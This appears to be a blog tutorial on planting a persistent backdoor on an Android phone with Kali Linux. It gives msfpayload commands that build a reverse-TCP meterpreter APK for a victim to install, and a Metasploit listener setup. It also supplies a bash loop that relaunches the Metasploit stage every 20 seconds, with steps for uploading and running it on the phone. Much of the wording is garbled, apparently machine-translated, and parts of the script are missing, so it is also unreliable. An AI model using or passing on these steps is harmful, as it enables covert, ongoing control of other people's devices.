Create a Persistent Back Door in Android Using Kali Linux Hack any Android

In this tutorial I will show you how to make the backdoor we have created in my guide here continue.

I finally found a way to do this, as I was / was very poor in bash scripting, it took me a lot of time (20hrs approx.) To make the script work and work, thanks to the green syntaxes I found on other sites.

Step 1: Fire Up Kali and Hack Android system:

Use this guide to hack an Android app on the LAN.

I will be breaking the WAN, using a VM.

Lets Create a back door by typing:

  • msfpayload android /meterpreter/reverse_tcp LHOST = R> /root/abcde.apk

  • Now, allow to set the listener:
  • msfconsole
  • use exploit /multi/handler
  • set android /meterpreter/reverse_tcp
  • set LHOST
  • exploit

After user/victim installation and opening abcde.apk, Meterpreter Rising ...

Don't MissHow to Open Somebody's Computer Without a Password (Setting Up the Payload)

Step 2: Create Persistent Script:

Here .. Copy these instructions to the script to build the script, and save it as anything.sh (File extension .sh is important!)


while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage / .MainActivity

sleep 20


(There is no line difference in the 3rd and 4th lines, they are single line)

(The first line #! /Bin/bash is also important as you see the script as bash Shell text)

(You can set to sleep for any number of seconds you want the script to sleep)

Move / Copy this to the Home/Root folder of kali.

Updated script v3 (Compatible with any version of Android)


..I think you will have to write it yourself .. (Don't ask me why ..)




do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20


There is a 'space' between 'while' and ':'

No Multiple spaces in the script.

NO Line Break between 3rd and 4th lines. (So ​​5 lines in total)

Step 3: Upload it to Android Hacking System:

You need to upload the Shell script to etc/init.d/ to persist or after a restart!

To do this, navigate to the index using the following instructions:

  • cd/

You should now be in the ROOT directory, you can check by typing:

  • ls

Now type:

  • cd etc

Check back by typing:

  • ls

Also change directory:

  • cd init.d
  • ls

Here we are ...

Time to Upload the Shell script

Do this by typing:

  • upload anything.sh

What The **** ? No! We need Root Access to complete this command! Dammm!

Don't MissHack any Computer Over Wi-Fi with the WiFi Duck Payload Deliverer


> Let's just make the application (eg Main Activity) presistent until the restart

> However, it will not persist after the Android app on Victim goes to reboot.

> To do this upload script anywhere on sdcard:

  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh

Done! Uploaded!

Step 4: Execute the script:

Now, all we have to do is run the script once, and then all will be done by text automatically.

Drop in to the shell of the application by typing:

  • shell

Now, navigate to the location of the Script:

  • cd /
  • cd /sdcard/Download
  • ls

Now is the time for Execution. Type:

  • sh anything.sh

Script Activated! All you have to do is press ctrl + C to Stop the shell (Don't worry the script is still in progress)

Restart to Eliminate the script or use Task Killer

Step 5: Testing ...

You can check it by exiting the meterpreter and setting the listener.

You should get a meterpreter immediately!


WOW! It happened so fast that 3 Sessions opened in a row.

(I know the picture above shows that I am breaking the LAN instead of the WAN as my Public IP is strong and my router has some technical problems, so it keeps updating itself, so I showed the LAN, BUT there are no problems I checked in -WAN, works well)


Yes! Finally a persistent backdoor is successfully designed for Android applications.

Don't MissHow to Hack Facebook Without Phishing SOP (Same Origin Policy)

Things to Remember:

  • Background persistence will only remain until the Android system restart.
  • If you hack into the WAN and have a strong Public IP, then, the persistence will only last until your router restarts / your IP changes.
  • Remember to restart the android to complete the active script, when checking yourself on your Android System.
  • If the Victim Android system is rooted and your Public IP is Static, then:

1) Persistence will Remain forever on the WAN!

2) Persistence will remain forever on the LAN Obviously

Say goodbye to the Hackers!

Keep Comming for More!

I will be Waiting for Your Comments and Likes

Thank you.

Post a Comment